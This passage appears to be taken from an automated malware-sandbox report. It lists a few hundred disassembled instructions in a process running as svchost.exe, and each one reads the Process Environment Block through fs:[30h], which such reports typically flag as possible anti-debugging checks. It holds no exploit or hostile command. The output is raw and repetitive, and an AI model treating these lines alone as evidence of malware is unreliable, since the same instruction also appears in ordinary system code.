Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]	2_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]	2_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]	2_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]	2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]	2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]	2_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]	2_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]	2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]	2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]	2_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]	2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]	2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]	2_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]	2_2_03872619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]	2_2_0384E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]	2_2_03866620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]	2_2_03868620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]	2_2_0383262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]	2_2_0384C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]	2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]	2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]	2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]	2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]	2_2_03862674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]	2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]	2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]	2_2_03864588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]	2_2_0386E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]	2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]	2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]	2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]	2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]	2_2_038365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]	2_2_038325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]	2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]	2_2_0386C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]	2_2_038C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]	2_2_03904500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]	2_2_0385E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]	2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]	2_2_03838550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]	2_2_0386656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]	2_2_038EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]	2_2_038364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]	2_2_038644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_038BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]	2_2_038304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]	2_2_03868402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]	2_2_0382E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]	2_2_0382C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]	2_2_038B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]	2_2_0386A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]	2_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]	2_2_038EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]	2_2_0382645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]	2_2_0385245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]	2_2_038BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]	2_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]	2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]	2_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]	2_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]	2_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_038DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]	2_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]	2_2_0385EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_038BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]	2_2_03904B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]	2_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]	2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]	2_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]	2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]	2_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]	2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]	2_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]	2_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]	2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]	2_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]	2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]	2_2_038D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]	2_2_03828B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]	2_2_038DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]	2_2_0382CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]	2_2_03904A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]	2_2_03868A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]	2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]	2_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]	2_2_03886AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]	2_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]	2_2_03830AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]	2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]	2_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]	2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]	2_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]	2_2_038BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]	2_2_0386CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]	2_2_0385EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]	2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]	2_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]	2_2_0386CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]	2_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]	2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]	2_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]	2_2_0386CA6F
